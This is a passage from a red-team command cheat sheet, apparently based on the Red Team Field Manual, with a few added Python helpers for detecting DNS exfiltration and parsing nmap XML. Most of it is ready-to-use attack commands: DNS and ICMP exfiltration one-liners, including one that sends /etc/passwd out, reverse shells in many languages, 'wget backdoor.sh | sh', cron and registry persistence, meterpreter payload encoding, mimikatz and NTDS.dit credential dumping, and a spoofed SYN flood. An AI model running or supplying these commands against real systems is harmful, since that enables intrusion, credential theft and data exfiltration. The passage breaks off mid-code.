5. Configure IPtables to port forward to Fiked server
   iptables -t nat -A PREROUTING -p udp -i eth0 -d <VPN Server IP> -j DNAT --to <Attacking Host IP>
   iptables -P FORWARD ACCEPT
6. Start Fiked to impersonate the VPN Server
   fiked -g <vpn gateway ip> -k <VPN Group Name>:<Group Pre-Shared Key>
7. Stop Ettercap
8. Restart Ettercap without the filter
   ettercap -T -M arp // //

PUTTY
REG KEY TO HAVE PuTTY LOG EVERYTHING (INCLUDING CONVERSATIONS)
"LogFileName"="%TEMP%\putty.dat"
"LogType"=dword:00000002

FILE TRANSFER
FTP THROUGH NON-INTERACTIVE SHELL
echo open <ip> 21 > ftp.txt
echo user >> ftp.txt
echo pass >> ftp.txt
echo bin >> ftp.txt
echo GET <file> >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt

DNS TRANSFER ON LINUX
On victim:
1. Hex the file to be transferred
   xxd -p secret > file.hex
2. Read in each line and do a DNS lookup
   for b in `cat file.hex`; do dig $b.shell.evilexample.com; done
On attacker:
1. Capture DNS exfil packets
   tcpdump -w /tmp/dns -s0 port 53 and host system.example.com
2. Cut the exfilled hex from the DNS packets
   tcpdump -r dnsdemo -n | grep shell.evilexample.com | cut -f9 -d' ' | cut -f1 -d'.' | uniq > received.txt
3. Reverse the hex encoding
   xxd -r -p < received.txt > keys.pgp

EXFIL COMMAND OUTPUT ON A LINUX MACHINE OVER ICMP
On victim (never-ending 1-liner):
stringZ=`cat /etc/passwd | od -tx1 | cut -c8- | tr -d " " | tr -d "\n"`; counter=0; while (($counter <= ${#stringZ})); do ping -s 16 -c 1 -p ${stringZ:$counter:16} 192.168.10.10 && counter=$((counter+16)); done
On attacker (capture to data.dmp and parse):
tcpdump -ntvvSxs 0 'icmp[0]=8' > data.dmp
grep 0x0020 data.dmp | cut -c21- | tr -d " " | tr -d "\n" | xxd -r -p

OPEN MAIL RELAY
C:\> telnet x.x.x.x 25
HELO x.x.x.x
MAIL FROM: me@you.com
RCPT TO: you@you.com
DATA
Thank You.
quit
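The detection-side counterpart to the DNS transfer above, added as an example that is not from RTFM. On the wire, `dig $b.<domain>` over the lines of `xxd -p` output looks like a run of queries whose leftmost label is nothing but hex under one parent domain, so the block groups such labels by parent from constructed query-log lines (the shape of `tcpdump -n port 53` output is assumed) and reassembles the carried bytes the way `xxd -r -p` would, which is what an incident responder needs to know what actually left the host.

```python
import re
from collections import defaultdict

# Constructed lines in the shape of `tcpdump -n port 53` output (not a real capture).
SAMPLE_LOG = """\
12:00:01.000 IP 10.1.2.3.41000 > 10.1.1.1.53: 1+ A? www.example.com. (32)
12:00:01.100 IP 10.1.2.3.41001 > 10.1.1.1.53: 2+ A? 5365637265742066696c6520313233.shell.evilexample.com. (60)
12:00:01.200 IP 10.1.2.3.41002 > 10.1.1.1.53: 3+ A? 0a6c696e652032.shell.evilexample.com. (52)
12:00:01.300 IP 10.1.2.3.41003 > 10.1.1.1.53: 4+ A? mail.example.com. (33)
12:00:01.400 IP 10.1.2.3.41004 > 10.1.1.1.53: 5+ A? 0a.shell.evilexample.com. (45)
"""

QUERY_RE = re.compile(r"\bA\?\s+([A-Za-z0-9.-]+)\.\s")
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")


def queried_names(log: str):
    """Yield the name from every A? query line, without the trailing dot."""
    for line in log.splitlines():
        match = QUERY_RE.search(line)
        if match:
            yield match.group(1)


def find_hex_label_streams(log: str, min_chunks: int = 2) -> dict:
    """Group leftmost labels that are pure, even-length hex by their parent
    domain, in wire order. Parents with fewer than min_chunks such labels are
    dropped so a single hex-looking host name ('cafe', '1234') does not raise
    an alert on its own."""
    streams = defaultdict(list)
    for name in queried_names(log):
        first, _, parent = name.partition(".")
        if parent and HEX_RE.match(first) and len(first) % 2 == 0:
            streams[parent].append(first)
    return {parent: chunks for parent, chunks in streams.items() if len(chunks) >= min_chunks}


def reassemble(chunks) -> bytes:
    """What `xxd -r -p` does to the cut-out labels: hex text back to bytes."""
    return bytes.fromhex("".join(chunks))


if __name__ == "__main__":
    for parent, chunks in find_hex_label_streams(SAMPLE_LOG).items():
        data = reassemble(chunks)
        print(f"{parent}: {len(chunks)} hex labels, {len(data)} bytes carried")
        print(data)
```

The ordering assumption matters: the reassembly is only faithful when the queries are read in the order they were sent, which holds for a single capture file but not for logs merged from several resolvers without timestamps. Raising min_chunks trades sensitivity for fewer false positives on CDN and cache-buster host names.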

REVERSE SHELLS [1] [3] [4]
NETCAT (* START LISTENER ON ATTACK BOX TO CATCH SHELL)
Linux reverse shell      nc 10.0.0.1 1234 -e /bin/sh
Windows reverse shell    nc 10.0.0.1 1234 -e cmd.exe

NETCAT (SOME VERSIONS DON'T SUPPORT -E OPTION)
nc -e /bin/sh 10.0.0.1 1234

NETCAT WORK-AROUND WHEN -E OPTION NOT POSSIBLE
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

PERL
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

PERL WITHOUT /BIN/SH
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

PERL FOR WINDOWS
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

PYTHON
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.0.0.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'

BASH
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

JAVA
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

RUBY
ruby -rsocket -e 'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

RUBY WITHOUT /BIN/SH
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

RUBY FOR WINDOWS
ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

TELNET
rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0</tmp/p
--OR--
telnet attackerip 4444 | /bin/bash | telnet attackerip 4445

XTERM
xterm -display 10.0.0.1:1
o Start Listener: Xnest :1
o Add permission to connect: xhost +victimIP

MISC
wget http://<server>/backdoor.sh -O- | sh
Downloads and runs backdoor.sh

PERSISTENCE
FOR LINUX PERSISTENCE (ON ATTACK BOX)
crontab -e : set for every 10 min
0-59/10 * * * * nc <ip> 777 -e /bin/bash

WINDOWS TASK SCHEDULER PERSISTENCE
sc config schedule start= auto
net start schedule (START TASK SCHEDULER)
at 13:30 ""C:\nc.exe <ip> -e cmd.exe""

WINDOWS PERSISTENT BACKDOOR WITH FIREWALL BYPASS
1. REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\backdoor.exe" /f
2. at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\backdoor.exe"
3. SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\backdoor.exe" /ED 12/12/2012

REMOTE PAYLOAD DEPLOYMENT VIA SMB OR WEBDAV [6]
Via SMB:
1. From the compromised machine, share the payload folder
2. Set sharing to 'Everyone'
3. Use psexec or wmic command to remotely execute payload

Via WebDAV:
1. Launch Metasploit 'webdav file server' module
2. Set following options:
   payload
   payload directory
3. Use psexec or wmic command to remotely execute payload

psexec \\<remote ip> /u domain\compromised_user /p password "\\<payload ip>\test\msf.exe"
OR wmic /node:<remote ip> /user:domain\compromised_user /password:password process call create "\\<payload ip>\test\msf.exe"

TUNNELING
FPIPE - LISTEN ON 1234 AND FORWARD TO PORT 80 ON 2.2.2.2
fpipe.exe -l 1234 -r 80 2.2.2.2

SOCKS.EXE - SCAN INTRANET THROUGH SOCKS PROXY
On redirector (1.1.1.1):
socks.exe -i1.1.1.1 -p 8080
On attacker:
Modify /etc/proxychains.conf:
Comment out: proxy_dns
Comment out: socks4 127.0.0.1 9050
Add line: socks4 1.1.1.1 8080
Scan through socks proxy:
proxychains nmap -PN -vv -sT -p 22,135,139,445 2.2.2.2

SOCAT - LISTEN ON 1234 AND FORWARD TO PORT 80 ON 2.2.2.2
socat TCP4-LISTEN:1234 TCP4:2.2.2.2:80

STUNNEL - SSL ENCAPSULATED NC TUNNEL (WINDOWS & LINUX) [8]
On attacker (client):
Modify /stunnel.conf
client = yes
[netcat client]
accept = 5555
connect = <NC TUNNEL IP>:4444

On victim (listening server):
Modify /stunnel.conf
client = no
[netcat server]
accept = 4444
connect = <port>
C:\> nc -vlp <port>

On attacker:
# nc -nv 127.0.0.1 5555

GOOGLE HACKING
search within a number range          numrange:[#]-[#]
search within past [#] months         date:[#]
find pages that link to [url]         link:[url]
find pages related to [url]           related:[url]
find pages with [string] in title     intitle:[string]
find pages with [string] in url       inurl:[string]
find files that are xls               filetype:[xls]
find phone book listings of [name]    phonebook:[name]

VIDEO TELECONFERENCING
POLYCOM
telnet <ip>   #Enter 1 char, get uname:pwd
http://<ip>/getsecure.cgi
http://<ip>/era_rcl.htm
http://<ip>/a_security.htm
http://<ip>/a-rc.htm

TANDBERG
http://<ip>/snapctrl.ssi

SONY WEBCAM
http://<ip>/<str>
8101046202FF : Freeze Camera

NMAP
SCAN TYPES
-sP   ping scan
-sS   syn scan
-sT   connect scan
-sU   udp scan
-sO   protocol scan

OPTIONS
-p1-65535          ports
-T[0-5]
-sV                version detection
-n                 no dns resolution
-PN                no ping
-6                 IPv6 scan
-O                 OS detection
-A                 aggressive scan
--randomize-hosts

OUTPUT / INPUT
-oX file           write to xml file
-oG file           write to grep file
-oA file           save as all 3 formats
-iL file           read hosts from file
--exclude file     excludes hosts in file

OPTIONS
-sV -p#
--traceroute
--ttl              set TTL
--script script.

FIREWALL EVASION
-f                 fragment packets
-S ip              spoof src
-g #               spoof src port
-D ip,ip           Decoy
--mtu #            set MTU size
--spoof-mac mac
--data-length size (append random data)
--scan-delay 5s

CONVERT NMAP XML FILE TO HTML:
xsltproc nmap.xml -o nmap.html

GENERATE LIVE HOST FILE:
nmap -sP -n -oX out.xml 1.1.1.0/24 2.2.2.0/24 | grep "Nmap" | cut -d " " -f 5 > live_hosts.txt

COMPARE NMAP RESULTS
ndiff scan1.xml scan2.xml

DNS REVERSE LOOKUP ON IP RANGE
nmap -R -sL --dns-servers <server> 1.1.1.0/24

IDS TEST (XMAS SCAN WITH DECOY IPS AND SPOOFING)
for x in {1..10000..1};do nmap -T5 -sX -S <spoof-source-IP> -D <comma separated with no spaces list of decoy IPs> --spoof-mac aa:bb:cc:dd:ee:ff -e eth0 -Pn <targeted-IP>;done
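The GENERATE LIVE HOST FILE and COMPARE NMAP RESULTS steps above done from the XML that -oX writes rather than with grep/cut, as an added example that is not RTFM's own code. Reading the <status state="up"> and <address addrtype="ipv4"> elements is robust to the text-output wording changing between nmap versions, and keeping two scans' host sets makes the "what appeared, what vanished" question that ndiff answers a one-line set difference. Both XML documents are constructed in nmap's layout; no scan was run.

```python
import xml.etree.ElementTree as ET

# Constructed in the layout nmap -oX writes; not output from a real scan.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sP -n -oX out.xml 1.1.1.0/24">
  <host><status state="up" reason="arp-response"/>
    <address addr="1.1.1.1" addrtype="ipv4"/>
    <address addr="00:11:22:33:44:55" addrtype="mac"/>
  </host>
  <host><status state="down" reason="no-response"/>
    <address addr="1.1.1.2" addrtype="ipv4"/>
  </host>
  <host><status state="up" reason="echo-reply"/>
    <address addr="1.1.1.7" addrtype="ipv4"/>
    <hostnames><hostname name="printer.lab" type="PTR"/></hostnames>
  </host>
</nmaprun>
"""

# A second constructed scan of the same range, for the ndiff-style comparison.
SAMPLE_XML_LATER = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sP -n -oX out2.xml 1.1.1.0/24">
  <host><status state="down" reason="no-response"/>
    <address addr="1.1.1.1" addrtype="ipv4"/>
  </host>
  <host><status state="up" reason="echo-reply"/>
    <address addr="1.1.1.7" addrtype="ipv4"/>
  </host>
  <host><status state="up" reason="arp-response"/>
    <address addr="1.1.1.9" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def live_hosts(xml_text: str):
    """(ipv4, hostname-or-empty) for every <host> whose <status> is up."""
    root = ET.fromstring(xml_text)
    result = []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        ipv4 = host.find("address[@addrtype='ipv4']")
        if ipv4 is None:
            continue
        hostname = host.find("hostnames/hostname")
        result.append((ipv4.get("addr"), hostname.get("name") if hostname is not None else ""))
    return result


def live_host_file(xml_text: str) -> str:
    """The content the grep/cut pipeline writes to live_hosts.txt: one IP per line."""
    return "\n".join(ip for ip, _ in live_hosts(xml_text)) + "\n"


def diff_scans(old_xml: str, new_xml: str):
    """(appeared, disappeared) sets of live IPs between two scans of one range."""
    old = {ip for ip, _ in live_hosts(old_xml)}
    new = {ip for ip, _ in live_hosts(new_xml)}
    return new - old, old - new


if __name__ == "__main__":
    print(live_host_file(SAMPLE_XML), end="")
    appeared, disappeared = diff_scans(SAMPLE_XML, SAMPLE_XML_LATER)
    print("appeared:", sorted(appeared), "disappeared:", sorted(disappeared))
```

For real files, pass `open("out.xml").read()` to these functions; hosts that nmap reports with only a MAC or IPv6 address are skipped on purpose, since the live-host list the text pipeline produces is IPv4 only.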

WIRESHARK
eth.addr/eth.dst/eth.src                  MAC
rip.auth.passwd                           RIP password
ip.addr/ip.dst/ip.src (ipv6.)             IP
tcp.port/tcp.dstport/tcp.srcport          TCP ports
tcp.flags (ack,fin,push,reset,syn,urg)    TCP flags
udp.port/udp.dstport/udp.srcport          UDP ports
http.authbasic                            Basic authentication
http.www_authentication                   HTTP authentication
http.data                                 HTTP data portion
http.cookie                               HTTP cookie
http.referer                              HTTP referer
http.server                               HTTP Server
http.user_agent                           HTTP user agent string
wlan.fc.type eq 0                         802.11 management frame
wlan.fc.type eq 1                         802.11 control frame
wlan.fc.type eq 2                         802.11 data frame
wlan.fc.type_subtype eq 0                 802.11 association request
wlan.fc.type_subtype eq 2                 802.11 reassociation req
wlan.fc.type_subtype eq 4                 802.11 probe request
wlan.fc.type_subtype eq 8                 802.11 beacon
wlan.fc.type_subtype eq 10                802.11 disassociate
wlan.fc.type_subtype eq 11                802.11 authenticate

COMPARISON OPERATORS
eq OR ==
ne OR !=
gt OR >
lt OR <
ge OR >=
le OR <=

LOGICAL OPERATORS
and OR &&
or OR ||
xor OR ^^
not OR !
NETCAT
BASICS
Connect to [TargetIP] Listener on [port]:
$ nc [TargetIP] [port]
Start Listener:
$ nc -l -p [port]

PORT SCANNER
TCP Port Scanner in port range [startPort] to [endPort]:
$ nc -v -n -z -w1 [TargetIP] [startPort]-[endPort]

FILE TRANSFERS
Grab a [filename] from a Listener:
1. Start Listener to push [filename]
   $ nc -l -p [port] < [filename]
2. Connect to [TargetIP] and Retrieve [filename]
   $ nc -w3 [TargetIP] [port] > [filename]
Push a [filename] to Listener:
1. Start Listener to pull [filename]
   $ nc -l -p [port] > [filename]
2. Connect to [TargetIP] and push [filename]
   $ nc -w3 [TargetIP] [port] < [filename]

BACKDOOR SHELLS
Linux Shell:
$ nc -l -p [port] -e /bin/bash
Linux Reverse Shell:
$ nc [LocalIP] [port] -e /bin/bash
Windows Shell:
$ nc -l -p [port] -e cmd.exe
Windows Reverse Shell:
$ nc [LocalIP] [port] -e cmd.exe

VLC STREAMING
# Use cvlc (command line VLC) on target to mitigate popups
CAPTURE AND STREAM THE SCREEN OVER UDP TO <attackerip>:1234
# Start a listener on attacker machine
vlc udp://@:1234
-- OR -- # Start a listener that stores the stream in a file.
vlc udp://@:1234 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:file{dst=test.mp4} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep
# This may make the user's screen flash. Lower frame rates delay the video.
vlc screen:// :screen-fps=25 :screen-caching=100 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:udp{dst=<attackerip>:1234} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep

CAPTURE AND STREAM THE SCREEN OVER HTTP
# Start a listener on attacker machine
vlc http://server.example.org:8080
-- OR -- # Start a listener that stores the stream to a file
vlc http://server.example.org:8080 --sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:file{dst=test.mp4}
# Start streaming on target machine
vlc screen:// :screen-fps=25 :screen-caching=100 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:http{mux=ffmpeg{mux=flv},dst=:8080/} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep

CAPTURE AND STREAM OVER BROADCAST
# Start a listener on attacker machine for multicast
vlc udp://@<multicastaddr>:1234
# Broadcast stream to a multicast address
vlc screen:// :screen-fps=25 :screen-caching=100 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:udp{dst=<multicastaddr>:1234} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep

CAPTURE AND RECORD YOUR SCREEN TO A FILE
vlc screen:// :screen-fps=25 :screen-caching=100 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:file{dst=C:\\Program Files (x86)\\VideoLAN\\VLC\\test.mp4} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep

CAPTURE AND STREAM THE MICROPHONE OVER UDP
vlc dshow:// :dshow-vdev="None" :dshow-adev="Your Audio Device"

SSH
/etc/ssh/ssh_known_hosts                          #System-wide known hosts
~/.ssh/known_hosts                                #Hosts user has logged into
sshd-generate                                     #Generate SSH keys (DSA/RSA)
ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key    #Generate SSH DSA keys
ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key    #Generate SSH RSA keys

If already in an ssh session, press SHIFT -C to configure tunnel
Port forwarding must be allowed on target
/etc/ssh/sshd_config - AllowTcpForwarding YES

TO ESTABLISH AN SSH CONNECTION ON DIFFERENT PORT
ssh root@2.2.2.2 -p 8222

SETUP X11 FORWARDING FROM TARGET, FROM ATTACK BOX RUN
xhost+
vi ~/.ssh/config - Ensure 'ForwardX11 yes'
ssh -X root@2.2.2.2

REMOTE PORT FORWARD ON 8080, FORWARD TO ATTACKER ON 443
ssh -R8080:127.0.0.1:443 root@2.2.2.2

LOCAL PORT FORWARD ON PORT 8080 ON ATTACK BOX AND FORWARDS THROUGH SSH TUNNEL TO PORT 3300 ON INTERNAL TARGET 3.3.3.3
ssh -L8080:3.3.3.3:443 root@2.2.2.2

DYNAMIC TUNNEL USED IN CONJUNCTION WITH PROXYCHAINS. ENSURE /ETC/PROXYCHAINS.CONF IS CONFIGURED ON CORRECT PORT (1080)
ssh -D1080 root@2.2.2.2
In a separate terminal run:
proxychains nmap -sT -p80,443 3.3.3.3

METASPLOIT
msfconsole -r file.rc                          Load resource file
msfcli | grep exploit/window                   List Windows exploits
msfencode -l                                   List available encoders
msfpayload -h                                  List available payloads
show exploits                                  Display exploits
show auxiliary                                 Display auxiliary modules
show payloads                                  Display payloads
search string                                  Search for string
info module                                    Show module information
use module                                     Load exploit or module
show options                                   Displays module options
show advanced                                  Displays advanced options
set option value                               Sets a value
sessions -v                                    List sessions: -k # (kill), -u # (upgrade to Meterpreter)
sessions -s script                             Run Meterpreter script on all sessions
jobs -l                                        List all jobs (-k # - kill)
exploit -j                                     Run exploit as job
route add ip nmask sid                         Pivoting
loadpath /home/modules                         Load 3rd party tree
irb                                            Live Ruby interpreter shell
connect -s ip 443                              SSL connect (NC clone)
route add ip mask session id                   Add route through session (pivot)
exploit/multi/handler set ExitOnSession False  Advanced option allows for multiple shells
set ConsoleLogging true (also SessionLogging)  Enables logging

CREATE ENCODED METERPRETER PAYLOAD (FOR LINUX: -T ELF -o CALLBACK)
./msfpayload windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> R | ./msfencode -t exe -o callback.exe -e x86/shikata_ga_nai -c 5

CREATE BIND METERPRETER PAYLOAD
./msfpayload windows/meterpreter/bind_tcp LHOST=<ip> LPORT=<port> X > cb.exe

CREATE ENCODED PAYLOAD USING MSFVENOM USING EXE TEMPLATE
./msfvenom --payload <payload> --format exe --template calc.exe -k --encoder x86/shikata_ga_nai -i 5 > callback.exe

START MSF DB (BT5 = MYSQL, KALI = POSTGRESQL)
/etc/rc.d/rc.mysqld start
msf> db_create root:pass@localhost/metasploit
msf> load db_mysql
msf> db_connect root:pass@localhost/metasploit
msf> db_import nmap.xml
Kali -- # service postgresql start
        # service metasploit start

PASS A SHELL (BY DEFAULT WILL LAUNCH NOTEPAD AND INJECT)
msf> use post/windows/manage/multi_meterpreter_inject
msf> set IPLIST <attack ip>
msf> set LPORT <callback port>
msf> set PIDLIST <PID to inject, default creates new notepad>
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set SESSION <meterpreter session ID>

HTTP BANNER SCAN ON INTERNAL NETWORK
msf> route add <ip/range> <netmask> <meterpreter ID>
msf> use post/multi/gather/ping_sweep           # Set options and run
msf> use auxiliary/scanner/portscan/tcp          # Set options and run
msf> hosts -u -S x.x.x -R                        # Searches for x.x.x.* and sets RHOSTS
msf> use auxiliary/scanner/http/http_version     # Set options and run
msf> services -v -p 80 -S x.x.x -R               # Displays IPs x.x.x.* with port 80 open

METERPRETER
help                                   List available commands
sysinfo                                Display system info
ps                                     List processes
getpid                                 List current PID
upload file C:\\Program\ Files\\       Upload file
download file                          Download file
reg command                            Interact with registry
rev2self                               Revert to original user
shell                                  Drop to interactive shell
migrate PID                            Migrate to another PID
background                             Background current session
keyscan (start|stop|dump)              Start/Stop/Dump keylogger
execute -f cmd.exe -i                  Execute cmd.exe and interact
execute -f cmd.exe -i -H -t            Execute cmd.exe as hidden process and with all tokens
hashdump                               Dumps local hashes
run script                             Executes script (/scripts/meterpreter)
portfwd [add|delete] -L 127.0.0.1 -l 443 -r 3.3.3.3 -p 3389    Port forward 3389 through session. Rdesktop to local port 443

PRIVILEGE ESCALATION
use priv
getsystem

IMPERSONATE TOKEN (DROP_TOKEN WILL STOP IMPERSONATING)
use incognito
list_tokens -u
impersonate_token domain\\user

NMAP THROUGH METERPRETER SOCKS PROXY
1. msf> sessions    #Note Meterpreter ID
2. msf> route add 3.3.3.0 255.255.255.0 <id>
3. msf> use auxiliary/server/socks4a
4. msf> run
5. Open a new shell and edit /etc/proxychains.conf
   i.   #proxy_dns
   ii.  #socks4 127.0.0.1 9050
   iii. socks4 1.1.1.1 1080
   Save and close conf file
6. proxychains nmap -sT -Pn -p80,135,445 3.3.3.3

RAILGUN - WINDOWS API CALLS TO POP A MESSAGE BOX
irb
client.railgun.user32.MessageBoxA(0,"got","you","MB_OK")

CREATE PERSISTENT WINDOWS SERVICE
msf> use post/windows/manage/persistence
msf> set LHOST <attack ip>
msf> set LPORT <callback port>
msf> set PAYLOAD_TYPE TCP|HTTP|HTTPS
msf> set REXENAME <filename>
msf> set SESSION <meterpreter session id>
msf> set STARTUP SERVICE

GATHER RECENTLY ACCESSED FILES AND WEB LINKS
meterpreter> run post/windows/gather/dumplinks

SPAWN NEW PROCESS AND TREE C:\
execute -H -f cmd.exe -a '/c tree /F /A c:\ > C:\temp\tree.txt'

ETTERCAP
WITH FILTER
ettercap.exe -I <iface> -M arp -Tq -F file.ef <MACs>/<IPs>/<Ports> <MACs>/<IPs>/<Ports>
#i.e.: //80,443 //    any MAC, any IP, ports 80,443

ENTIRE SUBNET WITH APPLIED FILTER
ettercap -T -M arp -F <filter> // //

SWITCH FLOOD
ettercap -TP rand_flood

ETTERCAP FILTER
COMPILE ETTERCAP FILTER
etterfilter filter.filter -o out.ef

SAMPLE FILTER - KILLS VPN TRAFFIC AND DECODES HTTP TRAFFIC
if (ip.proto == UDP && udp.dst == 500) {
  drop();
  kill();
}
if (ip.src == '<ip>') {
  if (tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding","Accept-Rubbish!");
      msg("Replaced Encoding\n");
    }
  }
}

MIMIKATZ
1. Upload mimikatz.exe and sekurlsa.dll to target
2. execute mimikatz
3. mimikatz# privilege::debug
4. mimikatz# inject::process lsass.exe sekurlsa.dll
5. mimikatz# @getLogonPasswords

HPING3
DoS FROM SPOOFED IPs
hping3 <targetIP> --flood --frag --spoof <ip> --destport <#> --syn

ARPING
ARP SCANNER
./arping -I eth# -a <# arps>

WINE
COMPILE EXE IN BACKTRACK
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o file.exe /tmp/code.c
wine file.exe

GRUB
CHANGE ROOT PASSWORD
GRUB Menu: Add 'single' to the end of the kernel line. Reboot. Change root password. Reboot.

HYDRA
ONLINE BRUTE FORCE
hydra -l ftp -P words -v <targetIP> ftp

JOHN THE RIPPER
CRACKING WITH A WORDLIST
$ ./john -wordfile:pw.lst -format:<format> hash.txt

FORMAT EXAMPLES
$ john username:SDbsuge8iC58A
$ john $1$12345678$aiccj83HRD8o6ux1bVx7D1
$ john A9993E364706816ABA3E25717850C26C9CD0D89D
# For NETLMv2 replace $NETLM with $NETLMv2
$ john $NETLM$1122334455667788$0836F0858124F33895875F81951905DD2F85252CC7318825
$ john username:$NETLM$1122334455667788$0836F0858124F33895875F81951905DD2F85252CC7318825
$ john username:$NETLM$1122334455667788$0836F0858124F33895875F81951905DD2F85252CC7318825:::::::
# Exactly 36 spaces between USER and HASH (SAPB and SAPG)
$ john ROOT                                    $8366A4E9E6B72C80
$ john username:ROOT                                    $8366A4E9E6B72C80
$ john ROOT                                    $1194E38F1489F3F8DA18181F14DE870E78DCC239
$ john username:ROOT                                    $1194E38F1489F3F8DA18181F14DE870E78DCC239
$ john $SHA1p$salt$59b3e8d637cf97edbe2384cf59cb7453dfe30789
$ john username:$SHA1p$salt$59b3e8d637cf97edbe2384cf59cb7453dfe30789
$ john $zip$*0*1*8005b1b7d077708d*dee4
$ john username:$zip$*0*1*8005b1b7d077708d*dee4

PASSWORD WORDLIST
GENERATE WORDLIST BASED OFF SINGLE WORD
#Add lower(@), upper(,), number(%) and symbol(^) to the end of the word
crunch 12 12 -t baseword@,%^ -o wordlist.txt

Use custom special character set and add 2 numbers then special character
maskprocessor -1 '<special chars>' baseword?d?d?1 >> wordlist.txt

VSSOWN [2]
1. Download: http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs
2. Create a new Shadow Copy
   a. cscript vssown.vbs /start (optional)
   b. cscript vssown.vbs /create
3. Pull the following files from a shadow copy:
   a. copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
   b. copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
   c. copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .
4. Copy files to attack box.
5. Download tools: dump_hash.zip
6. Configure and make source code for libesedb from the extracted package
   a. cd libesedb
   b. chmod +x configure
   c. ./configure && make
7. Use esedbdumphash to extract the datatable from ntds.dit.
   a. cd esedbtools
   b. ./esedbdumphash ../../ntds.dit
8a. Use dsdump.py to dump hashes from datatable using bootkey from SYSTEM hive
   a. cd ../../creddump/
   b. python ./dsdump.py ../SYSTEM ../libesedb/esedbtools/ntds.dit.export/datatable
8b. Use bkhive and samdump2 to dump hashes from SAM using bootkey from SYSTEM hive.
   a. bkhive SYSTEM key.txt
   b. samdump2 SAM key.txt
9. Dump historical hashes
   a. python ./dsdumphistory.py ../system ../libesedb/esedbtools/ntds.dit.export/datatable

FILE HASHING
HASH LENGTHS
MD5       16 bytes
SHA-1     20 bytes
SHA-256   32 bytes
SHA-512   64 bytes

SOFTWARE HASH DATABASE
# dig +short <md5>.md5.dshield.org TXT
Result = "<filename> | <source>"   i.e. "cmd.exe | NIST"

MALWARE HASH DATABASE
http://www.team-cymru.org/Services/MHR
# dig +short <MD5|SHA-1>.malware.hash.cymru.com TXT
Result = <last seen timestamp> <AV detection rate>
Convert timestamp = perl -e 'print scalar localtime(<timestamp>), "\n"'

FILE METADATA SEARCH
https://fileadvisor.bit9.com/services/search.aspx

SEARCH VIRUSTOTAL DATABASE
https://www.virustotal.com/#search

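Hex-length triage against the table above, with streamed file hashing, as an added example (not the manual's own code): a digest copied out of a report is matched to its likely algorithm before it is looked up in one of the databases listed. The temp-file content and sample bytes are constructed for the example.

```python
import hashlib
import os
import re
import tempfile

# Digest sizes from the HASH LENGTHS table, and the hashlib names they map to.
DIGEST_BYTES = {"MD5": 16, "SHA-1": 20, "SHA-256": 32, "SHA-512": 64}
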